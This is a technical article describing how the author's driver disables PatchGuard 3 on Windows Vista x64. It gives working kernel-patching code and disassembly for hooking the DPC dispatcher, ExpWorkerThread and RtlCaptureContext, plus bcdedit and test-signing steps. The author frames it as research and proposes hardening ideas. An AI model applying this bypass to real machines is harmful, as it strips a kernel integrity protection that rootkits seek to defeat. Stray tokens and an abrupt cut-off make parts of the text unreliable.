There is another thing to mention. You can of course disable PatchGuard in a DOCUMENTED, STABLE and EASY manner, by running the following commands in a root-shell and restarting the PC afterwards:ios
Bcdedit /debug ON Bcdedit /dbgsettings SERIAL DEBUGPORT:1 BAUDRATE:115200 /start AUTOENABLE /noumex
This article shows how to bypass PatchGuard 3 on the latest windows versions.shell
For better maintainence, you will find updates at http://www.codeplex.com/easyhook. This article belongs to a project that also supports kernel mode hooking.windows
Please note that this article is designed to be read parallel with the source code. Also I highly recommend to read the first uninformed article (link follows), otherwise you won't understand much of the work covered here. This is no tutorial and beginners should not read it. There are so much things to know about PatchGuard that it is impossible to cover them all in one single article. Also I don't want to repeat other guys work!sass
You will find a PDF version of this documentation here.bash
1 Introduction to PatchGuard session
3 Using and compiling the drivers less
4 Ideas for PatchGuard 4
5 Windows timer internalsdom
If you want awesome technical articles about how PatchGuard is working, I can only recommend the following (mine is about how to disable it and not that much about how PatchGuard is working):ide
• PatchGuard 1: http://www.uninformed.org/?v=3&a=3&t=pdf (recommended)
• PatchGuard 2: http://www.uninformed.org/?v=6&a=1&t=pdf
• PatchGuard 3: http://www.uninformed.org/?v=8&a=5&t=pdf
There is another thing to mention. You can of course disable PatchGuard in a DOCUMENTED, STABLE and EASY manner, by running the following commands in a root-shell and restarting the PC afterwards:
Hide Copy Code
Bcdedit /debug ON Bcdedit /dbgsettings SERIAL DEBUGPORT:1 BAUDRATE:115200 /start AUTOENABLE /noumex
「noumex」 will disable user mode exceptions for kernel debuggers which in fact would Visual Studio prevent from working. 「AUTOENABLE」 will force PatchGuard to be disabled, because even if you don’t attach a kernel debugger, you could do it at any time, and that is enough. Don’t use this setting to write kernel patching software for end-users. The DEBUG switches will have many side-effects. Mainly with Visual Studio and probably other debuggers, but also with DRM content playback, I suppose. I also noticed an annoying system slowdown and a huge overall latency. The boot time will be increased too, probably because Windows is waiting for a debugger…
Why is PatchGuard disabled with these settings? Simply, because to set breakpoints, you will have to overwrite kernel code, for example, with INT3 and that would already be enough for PatchGuard to BSOD. Another aspect is that a debugger is a common way to explore PatchGuard ;-).
This driver is NOT intended to be used in any end-user scenarios. It has been tested on Windows Vista x64 (all updates, 01.08.2008) and on Windows Vista x64 SP1 (all updates, 01.08.2008). It is known to not work on an out-dated Windows, so make sure that all PatchGuard related updates (better all updates), released before the above dates, are installed. Any future Windows Update may shot this approach to hell, and would BSOD the systems of your customers in the worst case! This is not limited to my approach… There is no way to bypass PatchGuard on end-user PCs, but only on your own, where you have control about updates and may hide all future PatchGuard related ones, for example! The Symantec Showcase, how I like to call it, has proven that you only can rely on documented things, especially when dealing with the kernel. Like Microsoft said to Symantec, that they will release an update, BSODing related PCs, if Symantec puts PatchGuard bypassing code into their products, I am saying to you: Don’t ever release a PatchGuard bypassing or 64-Bit undocumented kernel hooking product to customers! An option may be the PatchGuard API, but I think it is not publicly available. BTW I disagree to Symantec’s opinion that they need to use undocumented kernel patching to develop security products. The only thing is that they already had such products and it would be very expensive for them to reinvent the wheel, by not using kernel patching. Microsoft just did the right thing by not listening to Symantec. Undocumented kernel patching can never be an option to raise security in a trusted environment like Vista 64-Bit. It will probably even lower security AND stability. It is Microsoft’s duty to protect the kernel against malware and this will already work very well with UAC, enforced driver signing (it really was a burden to get my test driver installed the first time, so I think the kernel security performs quite well) and PatchGuard. The story that 「malware is able to bypass PatchGuard」 is something strange. I never saw a signed virus. And even if so, there is no way to do something against it if malware already is in the kernel. In this case you just lost the fight. Malware instead should NEVER get into the kernel; this is what security software should care about and not some kind of unstable, undocumented and also unsafe or even useless Post-Mortem-Security.
The following data and structures are protected by PatchGuard:
• Modifying system service tables, for example, by hookingKeServiceDescriptorTable
• Modifying the interrupt descriptor table (IDT)
• Modifying the global descriptor table (GDT)
• Using kernel stacks that are not allocated by the kernel
• Patching any part of the kernel (detected only on AMD64-based systems)
PG uses a system check routine that validates all the above structures and data. Basically PatchGuard is about how to protect this system check routine from being cracked. Cracking means to violate at least one of the above statements without knowledge of PatchGuard. This article describes how to violate ALL of them by completely disabling PatchGuard!
In the following I will refer to so called 「code paths」. Those are meant to invoke the system check routine. The simplest way is to directly call it, like you would call any other API. But PatchGuard is about making it as hard as possible to
• Find out how the system check routine is invoked
• Interfere with this invocation (by preventing/redirecting it)
• Disassemble the system check routine or find out its entry point address
To accomplish this task, PatchGuard uses various tricks and uncommon processor behavior to obfuscate as much as possible. The system check routine itself will be executed every few minutes.
The following is a diagram for the code logic of PatchGuard:
The orange arrow applies to PatchGuard 3 only. As you can see, PatchGuard uses the general purpose mechanism for delayed code execution (timers). There are ten PatchGuard related DPC routines:
CmpEnableLazyFlushDpcRoutine<br />CmpLazyFlushDpcRoutine<br />ExpTimeRefreshDpcRoutine<br />ExpTimeZoneDpcRoutine<br />ExpCenturyDpcRoutine<br />ExpTimerDpcRoutine<br />IopTimerDispatch<br />IopIrpStackProfilerTimer<br />KiScanReadyQueues<br />PopThermalZoneDpc
But keep in mind that those are also executing important system code if PatchGuard is not invoked. This switch is made by passing an invalid pointer as DeferredContext
. One may say that this is buggy, because dereferencing an invalid pointer at dispatch level throws a non-catchable trap resulting in a bug check. But PatchGuard is using a so called non-canonical pointer. Such a pointer does not follow the x64 processor specification that requires a pointer to have to upper 16 bits either set to one or zero (that is 0x0000 or 0xFFFF). A non-canonical pointer starts with 0x6238, 0xF10A and so on. Dereferencing them will instead cause a general protection fault, which is catchable and in case of PatchGuard, executes the system check routine.
PatchGuard 3 further has the ability to resume execution in the DPC routine after a #GP, probably raising another one, which again could decide to invoke the system check routine or continue execution. PatchGuard 3 also may execute the system check routine without raising an exception at all. What it does for a particular DPC depends on the encrypted DeferredContext
and probably also on the DPC itself. So we just don’t know!
The following is a code flow diagram of PatchGuard. The green boxes apply to all PatchGuard versions whereas the yellow box only applies since PatchGuard 2 and the orange boxes to PatchGuard 3. Please keep in mind that most of the stuff is just 「guessing」. I am optimistic that the following diagram will be a good approximation:
As you can see, PG3 has become much more flexible and thus much harder to bypass. My driver will attack the red arrows:
「DPC Dispatcher」 to 「PatchGuard DPC」
The driver filters all DPCs with PatchGuard specific parameters as
DeferredContext
. Further it catches the non-SEH code path of PatchGuard which previously has been overwritten with unhandled breakpoints, finding their way back to the exception handler in my driver! Of course there are still some DPCs left and this is why we need to add further blocking.
「Dynamic stub」 to 「System check」 and 「PatchGuard DPC to System check」
By overwriting the dynamic stubs and parts of the PatchGuard DPCs with breakpoints, execution continues in the DPC interceptor’s exception handler instead of the system check routine.
「ExpWorkerThread」 to 「Dynamic stub」 and 「Unknown」
Another hook is applied to the worker thread queue. This is filtering all dynamic worker routines and wrapping all others in a try-except statement. Some special kinds of system check invocations which seem to be incompatible with the next blocking mechanism are always originated from the worker queue. But as I said, we filter them, so their incompatibility won’t cause any harm...
「System check」 to 「KeBugCheckEx」
Only PatchGuard methods raised overExQueueWorkItem
get here. It is a burden to reproduce this case because you have to restart 10 – 30 times…
This block just suspends allCRITICAL_STRUCTURE_CORRUPTION
s. So they never cause the system to BSOD.
The problem was that the driver caught the bug check attempt but failed to suspend the calling worker thread. Then I also hookedExpWorkerThread
and since that step, only suspend able calls toKeBugCheckEx
are made.
By patching some of the code paths, I could extract interesting call stacks on their way to the system check routine.
The following is one of the longest possible call stacks in case of PatchGuard. It raises two handled #GPs and finally invokes the system check routine directly from the DPC without exception handling:
Hide Shrink Copy Code
nt!KeBugCheckEx nt! ?? ::FNODOBFM::`string'+0x12767 nt!KiExceptionDispatch+0xae nt!KiBreakpointTrap+0xb7 nt!ExpTimeRefreshDpcRoutine+0x1e6 nt!_C_specific_handler+0x8c nt!RtlpExecuteHandlerForException+0xd nt!RtlDispatchException+0x228 nt!KiDispatchException+0xc2 nt!KiExceptionDispatch+0xae nt!KiGeneralProtectionFault+0xcd nt!ExpTimeRefreshDpcRoutine+0xf1 nt!_C_specific_handler+0x140 nt!RtlpExecuteHandlerForUnwind+0xd nt!RtlUnwindEx+0x233 nt!_C_specific_handler+0xcc nt!RtlpExecuteHandlerForException+0xd nt!RtlDispatchException+0x228 nt!KiDispatchException+0xc2 nt!KiExceptionDispatch+0xae nt!KiGeneralProtectionFault+0xcd nt!KiCustomRecurseRoutine0+0xd nt!KiCustomRecurseRoutine9+0xd nt!KiCustomRecurseRoutine8+0xd nt!KiCustomRecurseRoutine7+0xd nt!KiCustomAccessRoutine7+0x22 nt!ExpTimeRefreshDpcRoutine+0x54 <== PatchGuard DPC nt!KiRetireDpcList+0x155 nt!KiIdleLoop+0x5f nt!KiSystemStartup+0x1d4
The interesting thing about this one is that the #GPs were handled by PatchGuard, but didn’t invoke the system check routine. So we have proven that an access violation is not necessarily invoking the SCR since PatchGuard 3.
The next one in contrast is one of the shortest possible call stacks. It invokes the system check routine over a resident method (copied into non-paged pool). You probably see where this article will go to, because my driver is also listed in the call stack:
Hide Copy Code
nt!KeBugCheckEx nt! ?? ::FNODOBFM::`string'+0x12767 nt!KiExceptionDispatch+0xae nt!KiBreakpointTrap+0xb7 0xfffffa80010b3cc9 <== PatchGuard’s dynamic method 0xfffffa80010bbc00 <== PatchGuard’s optional intro PG3Disable!VistaAll_DpcInterceptor+0x34 nt!KiRetireDpcList+0x117 nt!KiIdleLoop+0x62 …
Someone who already tried to disable PatchGuard may wonder how I got these call stacks. The KiBreakPointTrap
should be self explaining. I patched the code paths with unhandled breakpoints. So instead of invoking the system check routine, KeBugCheckEx
will create a memory dump and we can work with it in a post-mortem session using WinDbg.
One way to filter PatchGuard DPCs was to detect its special DeferredContext
values and cancel related timers. Since PatchGuard 3, this alone is not sufficient enough. But it is still a good starting point to filter out most of PatchGuard’s DPCs before they actually raise the system check routine.
The following code snipped is able to tell whether a given pointer is a PatchGuard context or not:
Hide Shrink Copy Code
BOOLEAN CheckSubValue(ULONGLONG InValue) { ULONG i; ULONG Result; UCHAR* Chars = (UCHAR*)&InValue; // random values will have a result around 120... Result = 0; for(i = 0; i < 8; i++) { Result += ((Chars[i] & 0xF0) >> 4) + (Chars[i] & 0x0F); } // the maximum value is 240, so this should be safe... if(Result < 70) return TRUE; return FALSE; } BOOLEAN PgIsPatchGuardContext(void* Ptr) { ULONGLONG Value = (ULONGLONG)Ptr; UCHAR* Chars = (UCHAR*)&Value; LONG i; // those are sufficient proves for canonical pointers... if((Value & 0xFFFF000000000000) == 0xFFFF000000000000) return FALSE; if((Value & 0xFFFF000000000000) == 0) return FALSE; // sieve out other common values... if(CheckSubValue(Value) || CheckSubValue(~Value)) return FALSE; if(Ptr == NULL) return FALSE; //This must be the last check and filters latin-char UTF16 strings... for(i = 7; i >= 0; i -= 2) { if(Chars[i] != 0) return TRUE; } // this should only return true if the pointer is a unicode string!!! return FALSE; }
The problem is that our task here is NOT to filter non-canonical pointers. Our task is to distinguish between PatchGuard context parameters and any other common DeferredContext
value such as zero, some table indices like 「1, 2, 3, 4, 5, …」, Unicode sequences, etc. All in all the above code detects pseudo random values.
With this ability in mind, we can now look at how to patch the DPC dispatcher, which is the only way to apply these custom checks.
In order to disable PatchGuard 3, we will have to block all DPCs with a PatchGuard specific context and to catch the exceptions raised by unhandled breakpoints. But there still seem to be code paths left, running in a worker queue, executing the system check routine and finally raising the bug check. For this purpose we will also hook KeBugCheckEx
and suspend all threads raising a CRITICAL_STRUCTURE_CORRUPTION
. Please note that the latter is a very rare case and won’t impact system performance. But this is still not enough. Some of the KeBugCheckEx
calls are not suspend able. I solved this by also hooking ExpWorkerThread
, filtering out dynamic stubs and wrapping all others in a try-except statement.
It is time to mention that KiRetireDpcList
and KiTimerExpiration
are the only points in the kernel which are responsible for dispatching queued DPCs. If you look at the disassembly for KiTimerExpiration
and KiRetireDpcList
, which is quite too long for showing, you will find the following four indirect call code blocks:
Hide Copy Code
nt!KiTimerExpiration+0x888: 488b5308 mov rdx, qword ptr [rbx+8] 488b4bf8 mov rcx, qword ptr [rbx-8] 4d8bcc mov r9, r12 4c8bc7 mov r8, rdi ff13 call qword ptr [rbx] 4084f6 test sil, sil 742c je nt!KiTimerExpiration+0x8d3
Hide Copy Code
nt!KiTimerExpiration+0x679: 488b5308 mov rdx,qword ptr [rbx+8] 488b4bf8 mov rcx,qword ptr [rbx-8] 4d8bcc mov r9,r12 4d8bc5 mov r8,r13 ff13 call qword ptr [rbx] 4084ed test bpl, bpl 742c je nt!KiTimerExpiration+0x7e5
Hide Copy Code
nt!KiTimerExpiration+0x799: 488b5308 mov rdx,qword ptr [rbx+8] 488b4bf8 mov rcx,qword ptr [rbx-8] 4d8bcc mov r9,r12 4d8bc5 mov r8,r13 ff13 call qword ptr [rbx] 4084ed test bpl, bpl 742c je nt!KiTimerExpiration+0x7e5
Hide Copy Code
nt!KiRetireDpcList+0x145: 4d8bcc mov r9, r12 4c8bc5 mov r8, rbp 488bd6 mov rdx, rsi 488bcf mov rcx, rdi ff542470 call qword ptr [rsp+70h] 4584ff test r15b, r15b 742b je nt!KiRetireDpcList+0x185
What we can see is that they are very similar and in all tested kernel images, these four code blocks were unique. So what are those blocks actually doing? They will invoke the user defined DPC routine…
But how does the thing look like under Windows Vista SP1? The following are the only two points in the SP1 kernel, executing user DPCs:
Hide Copy Code
Nt!KiTimerListExpire+0x31a: 458b4e04 mov r9d,dword ptr [r14+4] 458b06 mov r8d,dword ptr [r14] 4189ac24a0370000 mov dword ptr [r12+37A0h], ebp 488b5308 mov rdx, qword ptr [rbx+8] 488b4bf8 mov rcx, qword ptr [rbx-8] ff13 call qword ptr [rbx] 4084ff test dil, dil 0f856c8ffdff jne nt! ?? ::FNODOBFM::`string'+0x39742
Hide Copy Code
nt!KiRetireDpcList+0x107: 4d8bce mov r9,r14 4d8bc5 mov r8,r13 498bd4 mov rdx,r12 488bcb mov rcx, rbx ff542470 call qword ptr [rsp+70h] 4584ff test r15b,r15b 0f856e7ffdff jne nt! ?? ::FNODOBFM::`string'+0x39888
One will observe, that even if the whole underlying code logic has changed (only two DPC invocations, another method for expiring timers, far jumps at the end, etc.), it does still look very similar. Also the chance that a usual Windows Update changes the machine code for this part is quite small. Before developing any flexible mechanism we just search for the plain bytes. This works and is much more stable. For every update that changes the bytes we can simply add additional search vectors, currently I only know those two…
From now on I focus on Service Pack 1, because it only has two methods to patch and is more up to date. The code without Service Pack is quite similar and you should have no problems to understand it, once you got it for SP1.
How we can patch KiTimerExpiration
and KiRetireDpcList
if we nowhere can insert a JMP instruction without messing up the whole code logic? We will overwrite the last MOV instruction too and emulate it in a proper jumper table before we continue execution in our interception method:
Hide Copy Code
Nt!KiTimerListExpire+0x31a: 458b4e04 mov r9d,dword ptr [r14+4] 458b06 mov r8d,dword ptr [r14] 4189ac24a0370000 mov dword ptr [r12+37A0h], ebp 488b5308 mov rdx, qword ptr [rbx+8] 90 nop E8XXXXXXXX call TIMER_FIX 4084ff test dil, dil 0f856c8ffdff jne nt! ?? ::FNODOBFM::`string'+0x39742
Hide Copy Code
nt!KiRetireDpcList+0x107: 4d8bce mov r9,r14 4d8bc5 mov r8,r13 498bd4 mov rdx,r12 90 nop 90 nop E8XXXXXXXX call DPC_FIX 4584ff test r15b,r15b 0f856e7ffdff jne nt! ?? ::FNODOBFM::`string'+0x39888
Remember that this operation can and has to be performed atomically, by using a 64-Bit wide MOV instruction!
Some of you may probably ask their selves, where the hell do we wanna jump to with a 32-Bit offset and the custome image section (where our driver is located) being hundred gigabytes away?! I also thought much about it and there are only two solutions. The first one is a sledgehammer approach and I don’t like such. This is by stopping all CPUs except one, raising IRQL to HIGH_LEVEL
and putting an absolute call instruction in the two code blocks above. This is the only way one could replace more than eight bytes as an atomic operation. The other way is to hijack one of those ten very same KiCustomAccessRoutines
, PatchGuard is using to obfuscate the call stack. So what we do here is placing a jumper as first instruction of such a routine and redirecting it to another one. Now we can work with the other bytes, and there are quite enough, to build our jump table. Of course I know that even the atomic MOV instruction is not 100% safe. But the chance that a thread will be between the MOV and CALL, which our patch overwrites, and all this within such a short timeframe, is quite small. The NOPs have to be placed in front of the CALL because if the changes are rolled back when the driver is unloading, any code that currently is within the CALL instruction (this chance is in contrast pretty high) will still return to valid code, the TEST instruction, because the return address stays the same.
The jump table has to do two things. Firstly it should recover the overwritten MOV instruction and then invoke our interception method using an absolute far jumper. In case of SP1 we have to take care of two different cases and the code we place in such a custom access routine may look like this:
Hide Copy Code
nt!KiCustomAccessRoutine4: E9XXXXXXXX jmp KiCustomAccessRoutine0 TIMER_FIX: 488b4bf8 mov rcx,qword ptr [rbx-8] eb03 jmp INTERCEPTOR DPC_FIX: 488bcb mov rcx,rbx INTERCEPTOR: 48b8XXXXXXXXXXXXXXXX mov rax, VistaAll_DpcInterceptor ffe0 jmp rax
Well, that’s the entire mystic about patching the DPC invocation code. Now ANY DPC is going through our interceptor. You probably can imagine that there are a lot, because most interrupts will also raise a DPC; thus, the interceptor has to be executed as fast as possible.
Now we should take a look at the DPC interceptor:
Hide Shrink Copy Code
void VistaAll_DpcInterceptor( PKDPC InDpc, PVOID InDeferredContext, PVOID InSystemArgument1, PVOID InSystemArgument2) { ULONGLONG Routine = (ULONGLONG)InDpc->DeferredRoutine; __try { if((Routine >= 0xFFFFFA8000000000) && (Routine <= 0xFFFFFAA000000000)) { } else if(KeContainsSymbol((void*)Routine)) { if(!PgIsPatchGuardContext(InDeferredContext)) InDpc->DeferredRoutine( InDpc, InDeferredContext, InSystemArgument1, InSystemArgument2); } else InDpc->DeferredRoutine( InDpc, InDeferredContext, InSystemArgument1, InSystemArgument2); } __except(EXCEPTION_EXECUTE_HANDLER) { } }
The first thing we check is whether the DPC routine in either in the confines of the kernel image, where all of the ten DPCs reside, or in the memory pool, where the dynamic invocation stubs reside. This way we can reduce the chance that we are cancelling non-PatchGuard DPCs, because the kernel is very unlikely to have pseudo random numbers as DeferredContext
. Also I don’t know any sane driver that needs dynamic DPCs. After this check we can just skip all obvious PatchGuard DPCs and DeferredRoutines
residing in dynamic memory.
You may wonder about the exception frame. I mentioned earlier, that PatchGuard 3 introduces a code path that is not using exceptions and also only canonical DeferredContexts
. This way it would pass our filter and get to KeBugCheckEx
. The problem now is that PatchGuard may decide to directly invoke it (not using a worker thread), thus our hook would run at DPC level and cause a bug check (because a wait attempt at DPC level is not permitted). I solved this by overwriting some fingerprints with breakpoints, which actually converts such non-SEH code paths into SEH ones, because unhandled breakpoints throw a catchable exception! The following is the prototype of all memory resident dynamic methods:
Hide Copy Code
nt!KiTimerDispatch: 6690 xchg ax,ax 9c pushfq 4883ec20 sub rsp,20h 8b442420 mov eax,dword ptr [rsp+20h] 4533c9 xor r9d,r9d 4533c0 xor r8d,r8d 4889442430 mov qword ptr [rsp+30h],rax 488b4140 mov rax,qword ptr [rcx+40h] 48b90000000000f8ffff mov mov rcx,0FFFFF80000000000h 4833c2 xor rax,rdx 480bc1 or rax,rcx 48b9f048311148315108 mov rcx,8513148113148F0h <<<<<< 488b10 mov rdx,qword ptr [rax] c700f0483111 mov dword ptr [rax],113148F0h 4833d1 xor rdx,rcx 488bc8 mov rcx,rax ffd0 call rax 4883c420 add rsp,20h 59 pop rcx c3 ret
The driver will search for the bold printed byte sequence and overwrite it with breakpoints; that’s all!
Please note that the exception frame doesn’t bring any advantage for the SEH code path. I tried to catch it without the DPC filtering but the Driver Verifier does not seem to like it. Fortunately, the SEH code path does ALWAYS use non-canonical DeferredContext
values and that’s why we can filter it entirely.
Patching the DPC code alone is not enough. PatchGuard 3 also uses worker items to accomplish the same task. Our worker thread interceptor looks something similar, but is not the same:
Hide Copy Code
VOID VistaAll_ExpWorkerThreadInterceptor( PWORKER_THREAD_ROUTINE InRoutine, VOID* InContext, VOID* InRSP) { ULONGLONG Val = (ULONGLONG)InRoutine; if((Val >= 0xfffffa8000000000) && (Val <= 0xfffffaa000000000)) return; __try { InRoutine(InContext); } __except(EXCEPTION_EXECUTE_HANDLER) { } }
What we do here is to filter out all routines residing in dynamic memory, just like we did it in the DPC hook. Additionally we wrap all other routines in a try-except statement. The context of a PatchGuard worker thread is canonical, so we have no chance to filter it out explicitly.
What I experienced so far is that PatchGuard is using dynamic methods also for the worker queue. After blocking them like above, there were still some bug checks left. They were originated from ExpWorkerThread
, but never gone through our handler! This is something strange because the disassembly shows that we only have on single point where the worker items are actually called. I only can imagine that PatchGuard is again using exceptions to redirect execution to a special exception handler, just like it did for the DPC handler. And this is why I also wrap the calls in a try-except statement!
The procedure of patching the worker queue is very similar to the DPC queue. We have the following bytes to patch:
Hide Copy Code
nt!ExpWorkerThread+0x11a: 5c pop rsp 2470 and al,70h 4c8b6318 mov r12,qword ptr [rbx+18h] 488b7b10 mov rdi,qword ptr [rbx+10h] >498bcc mov rcx,r12 >ffd7 call rdi 4c8d9ee0020000 lea r11,[rsi+2E0h] 4d391b cmp qword ptr [r11],r11
And redirect them to the very same jump table. The difference is that we don’t restore the registers in the jump table but in a prepared jump target in our driver:
Hide Copy Code
VistaSp0_ExpWorkerThread_Fix PROC mov rcx, rdi mov rdx, r12 mov r8, rsp jmp VistaAll_ExpWorkerThreadInterceptor VistaSp0_ExpWorkerThread_Fix ENDP
This will call the above interceptor and we are done!
With the work done so far, we are able to prevent, let’s say, 95% of all system check routine invocations. The other 5% will pass our DPC filter and are still causing a BSOD. I said earlier that we are going to hook KeBugCheckEx
to solve this issue. Well it is not that easy, because PatchGuard actually overwrites the method with a fresh copy, before invoking it. So we need to hook a subroutine. If we look at the first instructions
Hide Copy Code
nt!KeBugCheckEx: 48894c2408 mov qword ptr [rsp+8],rcx 4889542410 mov qword ptr [rsp+10h],rdx 4c89442418 mov qword ptr [rsp+18h],r8 4c894c2420 mov qword ptr [rsp+20h],r9 9c pushfq 4883ec30 sub rsp,30h fa cli 65488b0c2520000000 mov rcx,qword ptr gs:[20h] 4881c120010000 add rcx,120h e8c1050000 call nt!RtlCaptureContext
, we see that RtlCaptureContext
seems to be perfect for our task. This is because KeBugCheckEx
is calling it very early and thus the system is still in a sane state. In order to hook RtlCaptureContext
, we need to place a jumper as usual:
Hide Copy Code
Nt!RtlCaptureContext: 50 push rax 48b9Xxx mov rax, PG3Disable! RtlCaptureContext_Hook ffe0 jmp rax
The difference is that we are hooking a context capturing method and thus have to ensure that this context in particular is NOT changed by our hook. This is why we have to backup volatile registers. The jumper will continue execution in a native interception stub which was built only for the purpose of hooking RtlCaptureContext
:
Hide Shrink Copy Code
RtlCaptureContext_Hook PROC ; call high level handler without messing up the context structure... pushfq push rcx push rdx push r8 push r9 push r10 push r11 mov rcx, qword ptr[rsp + 136] mov rdx, qword ptr[rsp + 8 * 8] sub rsp, 32 call KeBugCheck_Hook mov qword ptr [rsp], rax add rsp, 32 pop r11 pop r10 pop r9 pop r8 pop rdx pop rcx popfq pop rax ; recover destroyed bytes of RtlCaptureContext pushfq mov word ptr [rcx+38h],cs mov word ptr [rcx+3Ah],ds mov word ptr [rcx+3Ch],es mov word ptr [rcx+42h],ss ; jump behind destroyed bytes... (return value of KeBugCheck_Hook) jmp qword ptr[rsp - 32 - 8 * 7 + 8] RtlCaptureContext_Hook ENDP
Firstly, it safely calls our KeBugCheck_Hook
method with the bug check code as first parameter and the caller of RtlCaptureContext
as second one. Secondly, it recovers the overwritten instructions of RtlCaptureContext
and finally continues execution behind the jumper.
If you now look at the KeBugCheck_Hook
Hide Copy Code
ULONGLONG KeBugCheck_Hook(ULONGLONG InBugCode, ULONGLONG InCaller) { FAST_MUTEX WaitAlways; if((InCaller >= KeBugCheckEx_Sym) && (InCaller <= KeBugCheckEx_Sym + 100)) { if(InBugCode == CRITICAL_STRUCTURE_CORRUPTION) { EnableInterrupts(); ExInitializeFastMutex(&WaitAlways); ExAcquireFastMutex(&WaitAlways); ExAcquireFastMutex(&WaitAlways); } } return RtlCaptureContext_Sym + 14; }
, you may observe that it just checks whether the caller is KeBugCheckEx
and the bug check code is CRITICAL_STRUCTURE_CORRUPTION
. If that is the case, it reenables interrupts, and block the thread forever. We are only able to do this, because we eliminated the chance, that this bug check was raised though the DPC dispatcher and it definitely would be, if we skip our DPC filter! If the caller was any other symbol, we just execute RtlCaptureContext
(). I assume that every thread switch will call this method, so this is the next critical execution path of Windows which we are hooking…
I am sure someone will ask whether this doesn’t lead to an endless thread creation loop with a period of some mintues. Again, we can only do this, because we disabled the DPC code path already. As the invokation method is randomly choosen, we cause one or two orphaned threads until PatchGuard is never executed again (because it does not always use ExQueueWorkItem
and if we block all other code paths, there is a point when no PatchGuard contexts are left).
OPERATION SUCCEEDED, PATIENT DEAD
So what we have done so far? We disabled PatchGuard 3 on Windows Vista SP1, all updates installed. Of course the patches we applied were not that common coding style ;-). But everyone will agree that potential malware is written like that and actually the patches are very stable for a given OS. You may rollback all changes after approx. 20 minutes. The reason is that PatchGuard will only add a new code path, if the system check routine is invoked. So when we block its execution for a reasonable period of time, there is nothing to block anymore… My driver does not support rolling back the changes so far and in fact never will. This is also why you can’t unload it after patching.
If you never developed a driver for 64-Bit, you have several obstacles to solve. Therefore I prepared a clean Windows installation. Now I will describe how you can build my drivers and install them.
As first step you should download the latest Windows Driver Kit from https://connect.microsoft.com/ and install it to 「C:\WinDDK」
for example. You have to register and sign in to Microsoft Passport I believe but after all it is still free.
Then you have to add a system wide environment variable called 「WDKROOT」
with the value of your installation path.
From now on I assume that you extracted the DisablePatchGuard archive to 「C:\PGDisable」
; so that the project solution is located in 「C:\PGDisable\PGDisable.sln」
.
To install a driver on Windows Vista, you have to sign it. Now open a root-shell and type the following commands:
Hide Copy Code
> Bcdedit –set TESTSIGNING ON
You need to restart the PC. After this we are ready to create a test certificate:
Hide Copy Code
> cd c:\winddk\bin\SelfSign > MakeCert -r -pe -ss PGDisableCertStore -n "CN=PGDisableCert" "c:\PGDisable\PGDisableCert.cer"
Now open the certificate in the Explorer by double clicking it. Currently the certificate is an untrusted one. To make Windows trusting the certificate, click <code>「Install certificate」
– 「Next」 – 「place all certificates in the following store」 – 「Trusted Root Certification Authorities」 – 「OK」 – 「Next」 – 「Finish」 and do the same procedure to add it to the 「Trusted Publishers」
store.
The project comes with a post-build event that relies on the fact that a certificate named 「PGDisableCert」
is in the 「PGDisableCertStore」
. This will automatically sign the drivers after each build and you have to care about nothing.
We are done and you can start building the project!
To keep the code simple, I didn’t provide much service management functionality. The application checks whether the driver is already installed. If not, it installs the driver. If yes, it just ensures that it is running.
But if you want to frequently recompile it, you need to make sure that the driver has been unloaded and removed from the service control manager, before you restart the application. Otherwise your newly compiled driver won’t be loaded because the old one is already there…
If you want to remove the driver from the service manager, just type 「sc delete PG3Disable.sys」
into a root shell. If the driver is currently running, this command will still succeed, but the driver actually stays installed. To prevent this you also have to stop it by using 「sc stop PG3Disable.sys」
. But keep in mind that due to the missing rollback of patches you won’t be able to load the driver again in the current system session (if you disabled PatchGuard)!
During development a frequent system restart is common. This is why I develop such drivers in a virtual machine.
The drivers in fact are very easy to use. The following table shows the supported control codes for the PG3Disable-Driver:
IOCTL_PATCHGUARD_DUMP
Writes a list of fingerprints to
「C:\patchguard.log」
. If you execute this command after disabling PatchGuard, the file should only contain eight custom access routines.
IOCTRL_PATCHGUARD_DISABLE
This silently disables PatchGuard on success.
Both control codes have no parameters and not return value. The only thing is the status code available through GetLastError
:
ERROR_SUCCESS
Operation has been completed successfully.
ERROR_NOT_SUPPORTED
This is returned either in case your system is not supported or PatchGuard was already patched by the driver. For stability reasons, the driver may decide to refuse patching sometimes; ten just try it 5-10 minutes later.
All other error values are not explicitly raised by my code but may be returned by invoked kernel APIs.
The PG2Disable-Driver works very similar but there are two main differences. Firstly, you can disable PatchGuard multiple times and will always get ERROR_SUCCESS
as result. Secondly, you may load/unload the driver as often as you like. Furthermore it exports an additional command:
IOCTL_PATCHGUARD_PROBE
Installs a test hook for
KeCancelTimer
. Please note that your system will BSOD if PatchGuard is not already disabled!
Please note that PG2Disable won’t work on Windows Vista SP1.
I really appreciate what Microsoft has done so far in order to harden PatchGuard. I don’t think that it takes much effort to raise the bar of work, necessary to disable PatchGuard, to a degree that can be considered as non-exploitable. I would eliminate the DPC dispatcher as the main point of failure. Microsoft should make critical symbols invisible through the debugger. This could possibly be done by exporting proper debugging APIs over service interrupts which are using all required symbols internally; this way the debugger doesn’t need to know about them but can still keep all functionality. Also some sort of a private way for delayed code execution would improve the whole thing.
A practical approach to realize this idea would be to define a macro named 「PATCHGUARD_INVOKATION」
, for example, and use it all over the windows source code, but only for unexported APIs of higher order (not called inside any public API). Then a pre-build event could automatically replace such a macro with randomly generated invocation stubs, or even do nothing for most occurrences. One could base the randomness on a constant value, so that major updates will use different constant values resulting in totally different PatchGuard invocation stubs, while minor updates won’t cause any changes to PatchGuard related sections in the binaries.
The form of delayed execution could be further improved by adding additional code to the internal interrupt handlers and only invoke PatchGuard after a counter has been incremented X times. Then this code again can check in a more expensive way whether it is 「time」 to do a system check or not. Even if one can still fingerprint many parts of PatchGuard, one could not disable it in a stable manner, because there are always some parts missing.
Further, multiple versions of the system check routine, which then of course shall go through a code morphing engine, would do their part.
Remember, the goal is not to make PatchGuard unexploitable on a single machine. The goal is to prevent malware from disabling it in an automated manner on a wide range of machines.
Now I want to write a little bit about my first investigations of PatchGuard 3. At the beginning I thought I could just cancel all the PatchGuard timers and I’d be done. As you can see I was mistaking, but that’s what programming is about ;-).
I don’t want to connect this with disabling PatchGuard. The reason is that PG3 actually is not exploitable with a timer cancelling approach. PG2 in fact is and the PG2Disable-Driver has all of the code required to do this and also shows how to extract the unexported kernel symbols in a stable manner (not working since Service Pack 1; here you’d have to use fingerprinting like it is done for KiRetireDpcList
, for example).
On the surface, there was nothing in the net that showed how to enumerate timers. Also the WDK documentation contained nothing about it. So I finally disassembled some of the timer routines like KeSetTimerEx
, KeCancelTimer
, etc. KeCancelTimer
seems to be the best starting point, because it is so small:
Hide Shrink Copy Code
